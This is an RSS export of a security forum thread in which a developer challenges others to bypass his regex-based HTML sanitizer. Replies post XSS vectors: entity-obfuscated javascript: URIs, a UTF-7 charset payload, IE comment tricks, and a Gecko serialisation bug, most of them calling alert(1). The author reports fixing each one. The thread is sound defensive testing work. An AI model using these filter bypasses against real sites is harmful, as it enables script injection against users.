<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Break a regex-based HTML parser</title>
        <description>Fast question, can you break it?
URL: http://eaea.sirdarckcat.net/testhtml.html

The objective is simple:
QuoteFind a valid HTML code that will be parsed incorrectly by the parser, AND/OR code that executes (if I forgot to remove some vector).

I will be removing basic JS execution vectors, anyway the CSS parser is not ready yet so I'll disable CSS completely. Also namespaces wont be allowed (no xul nor svg) and ns tags (&amp;lt;asdf:asdf&amp;gt;) will also be disabled for the time being.

frames wont be allowed (as well as embed/object/video/audio/etc..) and I think that's all :).

If you can execute JS let me know please :).

On IE I try to honor conditional comments, anyway I wont support them completely, since they are unsafe by default.

If you find some way to get HTML code where it shouldnt in weird scenarios you win!

I have to warn you that code like this:
&amp;lt;a href=&amp;quot;asdf'&amp;gt;&amp;lt;img src=&amp;quot;http://www.google.com&amp;quot;&amp;gt;hello&amp;lt;/a&amp;gt;

Will be parsed as:
&amp;lt;a&amp;gt;hello&amp;lt;/a&amp;gt;

Since every time I find &amp;quot; in an attribute's name, I will delete all arguments in the tag for security reasons.

So this other code (it's important to note there's no closing &amp;quot; quote):
&amp;lt;a href=&amp;quot;asdf'&amp;gt;&amp;lt;img src='http://www.google.com'&amp;gt;hello&amp;lt;/a&amp;gt;

Will be parsed as:
&amp;lt;a&amp;gt;&amp;lt;img src=&amp;quot;http://www.google.com&amp;quot;&amp;gt;hello&amp;lt;/a&amp;gt;

Some may argue that's a vulnerability, but there's no safer way of treating unclosed quotes in attributes.

Other thing: I am only allowing ' and &amp;quot; as quotes (so, ` wont work).

So well, examples of bypasses I've found (and are now fixed):
&amp;lt;!--[if true]&amp;gt;&amp;lt;img onerror=alert(1) src=--&amp;gt;
&amp;lt;form action=javascript:alert(1)&amp;gt;&amp;lt;input type=submit&amp;gt;

Protections vary from browser to browser (I will only remove dangerous things on a browser if they are dangerous in that browser).

I will make the CSS parser this week :)

Greetings!!</description>
        <link>http://sla.ckers.org/forum/read.php?2,29259,29259#msg-29259</link>
        <lastBuildDate>Thu, 20 Jun 2013 03:25:03 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,35651#msg-35651</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,35651#msg-35651</link>
            <description><![CDATA[&lt;bgsound src='javascript:alert(1)'&gt; - Opera, IE]]></description>
            <dc:creator>p0deje</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 09 Sep 2010 12:57:34 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33169#msg-33169</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33169#msg-33169</link>
            <description><![CDATA[Well, two problems..<br />
<br />
One is that our old IE6 supports 0 to none of DOM Level 3, and the other is that the bug appears when the code is transformed from DOM to String, if the user instead of doing document.write(cleanDOM.innerHTML) does document.documentElement.appendChild(cleanDOM), this bug would not happen.<br />
<br />
I hate Gecko bugs :(]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 24 Jan 2010 19:36:12 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33167#msg-33167</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33167#msg-33167</link>
            <description><![CDATA[@sirdarckcat  <br />
<br />
How about using the document fragments to checked the parsed html:-<br />
<br />
https://developer.mozilla.org/En/DOM/Document.createDocumentFragment]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 24 Jan 2010 09:04:18 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33165#msg-33165</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33165#msg-33165</link>
            <description><![CDATA[niice!<br />
<br />
o=new Option;o.innerHTML='javascript&amp;#x0;:alert(1);';h=o.textContent;a=document.createElement('a');a.setAttribute('href',h);o.appendChild(a);a.appendChild(document.createTextNode('a'));a=o.innerHTML;o.innerHTML=a;o.childNodes[1].href.match(/t:/);<br />
<br />
it's a bug on gecko transforming DOM to String :)<br />
<br />
It's not the first one, I added one more thing to the regex to clean attributes, as well as a pre-parsing for href attributes.<br />
<br />
That should cover similar bugs.. I'm thinking on how to solve problems like this long term, sadly I cant just do innerHTML+=''; browsers suck =/.<br />
<br />
Thanks!!! :)]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 24 Jan 2010 07:32:22 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33160#msg-33160</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33160#msg-33160</link>
            <description><![CDATA[Cool nice ones]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 23 Jan 2010 16:20:38 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33158#msg-33158</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33158#msg-33158</link>
            <description><![CDATA[<i>Nice</i> one doody! I think that's valid :) It can even be obfuscated some more<br />
<br />
&lt;a href=&quot;javascript &amp;#x:alert('1');&quot;&gt;click me&lt;/a&gt;]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 23 Jan 2010 14:36:56 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33157#msg-33157</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33157#msg-33157</link>
            <description><![CDATA[Hi, first post here =). Hope this is valid:<br />
<br />
&lt;a href=&quot;javascript&amp;#0:alert('1');&quot;&gt;click me&lt;/a&gt;]]></description>
            <dc:creator>doody</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 23 Jan 2010 13:13:30 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,32980#msg-32980</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,32980#msg-32980</link>
            <description><![CDATA[https://twitter.com/theharmonyguy/status/7666627119]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 12 Jan 2010 08:42:03 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,32502#msg-32502</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,32502#msg-32502</link>
            <description><![CDATA[I wish that old maluc was still with us, he always got some crazy shit going on with vectors, talkin' about 4 years ago on sla.ckers.]]></description>
            <dc:creator>rvdh</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 27 Nov 2009 12:10:30 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,32488#msg-32488</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,32488#msg-32488</link>
            <description><![CDATA[nice :) I hate IE hahaha<br />
<br />
thanks!! :D now I have to break jsreg again.. hahaha]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 26 Nov 2009 12:06:57 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,32483#msg-32483</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,32483#msg-32483</link>
            <description><![CDATA[So my friend you tempted me on twitter and if you wanted to social engineer me into testing your HTML parser it worked :)<br />
<br />
IE only:-<br />
&lt;!---&gt;&lt;script&gt;alert(1)&lt;/script&gt;--&gt;]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 26 Nov 2009 04:51:55 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29444#msg-29444</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29444#msg-29444</link>
            <description><![CDATA[Now Im using JSReg:<br />
http://eaea.sirdarckcat.net/testhtml.html<br />
<br />
So well! Im working (still) on the CSS parser.<br />
<br />
I was going to be the one applying the attributes to the elements, but I discovered that that's waaaaaaaaaay to slow, even with algorithmic-fu stuff haha, it's been the most algorithmic challenge I've had since the olympics of informatics/acm, but its impossible to optimize, after reviewing the webkit/mozilla implementations their solutions are the same or with a bigger complexity, but my code lives in JS so its slower :( (and they also are slow on the same rules I have problems like nth children and alike).<br />
<br />
Now I'll just filter the CSS (in a jsreg-alike approach), since the HTML parser for example was reconstructing the DOM and making it from scratch.]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 21 Jul 2009 22:18:49 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29319#msg-29319</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29319#msg-29319</link>
            <description><![CDATA[I think document.write protects against this, but this is completely empiric knowledge.<br />
<br />
I will dissallow Content-Type in http-equiv then :), just to be sure<br />
<br />
Greetz!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 16 Jul 2009 02:12:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29306#msg-29306</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29306#msg-29306</link>
            <description><![CDATA[<pre class="bbcode">
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-7&quot;&gt;
+ADw-script+AD4-alert(1)+ADw-/script+AD4-</pre>
<br />
Doesn't trigger an alert - but should work in other setups. I think changing the charset should be prohibited. Thoughts?]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 10:54:47 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29303#msg-29303</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29303#msg-29303</link>
            <description><![CDATA[<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;hello, world.&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;form action=&amp;#160;javascript:alert(1)&gt;&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-7&quot; /&gt;&lt;input type=submit&gt;&lt;/form&gt;+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-<br />
&lt;/body&gt;<br />
&lt;/html&gt;</div></blockquote>hm.. why should it work? haha I do document.write() that ignores content-type metas afaik (this is a bug I will address when events are working perfectly, and that will happend when I manage to finish the CSS parser).<br />
<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/> @sdc: Yes :) I was trying to say good work in my own words. the background gets stripped on only the browsers where it would be executed - Opera and IE.</div></blockquote>oh!! thanks then haha :D <br />
<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>&lt;img src=javascript&amp;#4864:alert(1)&gt; </div></blockquote>very nice gareth!! any particular reason to choose that char? fuzzing? do you have fuzz results? haha<br />
<br />
Greetz!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 07:23:42 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29297#msg-29297</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29297#msg-29297</link>
            <description><![CDATA[Opera only vector:-<br />
&lt;img src=javascript&amp;#4864:alert(1)&gt;<br />
<br />
Repro's randomly in Opera]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 05:15:26 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29295#msg-29295</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29295#msg-29295</link>
            <description><![CDATA[@sdc: Yes :) I was trying to say good work in my own words. the background gets stripped on only the browsers where it would be executed - Opera and IE.]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 04:16:37 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29294#msg-29294</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29294#msg-29294</link>
            <description><![CDATA[Sorry I should have tested it, I thought the HTML decoder was removing the entities but I couldn't see the nulls etc in the source anyway this should work (without a parent charset):-<br />
<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;hello, world.&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;form action=&amp;#160;javascript:alert(1)&gt;&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-7&quot; /&gt;&lt;input type=submit&gt;&lt;/form&gt;+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-<br />
&lt;/body&gt;<br />
&lt;/html&gt;]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 04:11:46 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29284#msg-29284</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29284#msg-29284</link>
            <description><![CDATA[@<b>gareth</b><br />
Thanks! but I cant reproduce, on which browser?<br />
<br />
My tests:<br />
On Firefox 3:<br />
The requested URL /ï¿½jï¿½aï¿½vï¿½ascriptï¿½:alert(1) was not found on this server.<br />
<br />
On IE8 and IETab:<br />
&lt;FORM  action=&quot;?j?a?v?ascript?:alert(1)&quot;&gt;<br />
<br />
On Opera 9:<br />
The requested URL /ï¿½jï¿½aï¿½vï¿½ascriptï¿½:alert(1) was not found on this server.<br />
<br />
On Chrome 3:<br />
The requested URL /&amp; was not found on this server.<br />
<br />
On Safari:<br />
The requested URL /&amp; was not found on this server.<br />
<br />
<br />
@<b>.mario</b><br />
I can't reproduce :(<br />
<br />
this<br />
<br />
&lt;body<br />
&lt;li background=&quot;javascript:alert(1)&quot;<br />
<br />
get's interpreted as:<br />
&lt;head&gt;&lt;/head&gt;&lt;body&gt;&lt;li background=&quot;javascript:alert(1)&quot;&gt;&lt;/li&gt;&lt;/body&gt;<br />
<br />
and firefox doesn't execute javascript URIs on background (as far as I've tested). Am I missing something? =/<br />
<br />
Greetings!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 14 Jul 2009 21:09:16 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29282#msg-29282</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29282#msg-29282</link>
            <description><![CDATA[<pre class="bbcode">
&lt;body
&lt;li background=&quot;javascript:alert(1)&quot;</pre>
<br />
Works in FF, Chrome but not in Opera - well played!]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 14 Jul 2009 17:34:22 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29278#msg-29278</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29278#msg-29278</link>
            <description><![CDATA[&lt;form action=&amp;#000000000j&amp;#000000000a&amp;#000000000v&amp;#000000000ascript&amp;#000000000:alert(1)&gt;]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 14 Jul 2009 14:25:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29259#msg-29259</guid>
            <title>Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29259#msg-29259</link>
            <description><![CDATA[Fast question, can you break it?<br />
URL: http://eaea.sirdarckcat.net/testhtml.html<br />
<br />
The objective is simple:<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>Find a valid HTML code that will be parsed incorrectly by the parser, AND/OR code that executes (if I forgot to remove some vector).</div></blockquote>
<br />
I will be removing basic JS execution vectors, anyway the CSS parser is not ready yet so I'll disable CSS completely. Also namespaces wont be allowed (no xul nor svg) and ns tags (&lt;asdf:asdf&gt;) will also be disabled for the time being.<br />
<br />
frames wont be allowed (as well as embed/object/video/audio/etc..) and I think that's all :).<br />
<br />
If you can execute JS let me know please :).<br />
<br />
On IE I try to honor conditional comments, anyway I wont support them completely, since they are <a href="http://eaea.sirdarckcat.net/conditionalcomments.html" rel="nofollow" >unsafe</a> by <a href="http://eaea.sirdarckcat.net/conditionalcomments2.html" rel="nofollow" >default</a>.<br />
<br />
If you find some way to get HTML code where it shouldnt in weird scenarios you win!<br />
<br />
I have to warn you that code like this:<br />
<pre class="bbcode">&lt;a href=&quot;asdf'&gt;&lt;img src=&quot;http://www.google.com&quot;&gt;hello&lt;/a&gt;</pre>
<br />
Will be parsed as:<br />
<pre class="bbcode">&lt;a&gt;hello&lt;/a&gt;</pre>
<br />
Since every time I find &quot; in an attribute's name, I will delete all arguments in the tag for security reasons.<br />
<br />
So this other code (it's important to note there's no closing &quot; quote):<br />
<pre class="bbcode">&lt;a href=&quot;asdf'&gt;&lt;img src='http://www.google.com'&gt;hello&lt;/a&gt;</pre>
<br />
Will be parsed as:<br />
<pre class="bbcode">&lt;a&gt;&lt;img src=&quot;http://www.google.com&quot;&gt;hello&lt;/a&gt;</pre>
<br />
Some may argue that's a vulnerability, but there's no safer way of treating unclosed quotes in attributes.<br />
<br />
Other thing: I am only allowing ' and &quot; as quotes (so, ` wont work).<br />
<br />
So well, examples of bypasses I've found (and are now fixed):<br />
<pre class="bbcode">&lt;!--[if true]&gt;&lt;img onerror=alert(1) src=--&gt;</pre>
<pre class="bbcode">&lt;form action=javascript:alert(1)&gt;&lt;input type=submit&gt;</pre>
<br />
Protections vary from browser to browser (I will only remove dangerous things on a browser if they are dangerous in that browser).<br />
<br />
I will make the CSS parser this week :)<br />
<br />
Greetings!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 13 Jul 2009 20:59:10 -0500</pubDate>
        </item>
    </channel>
</rss>
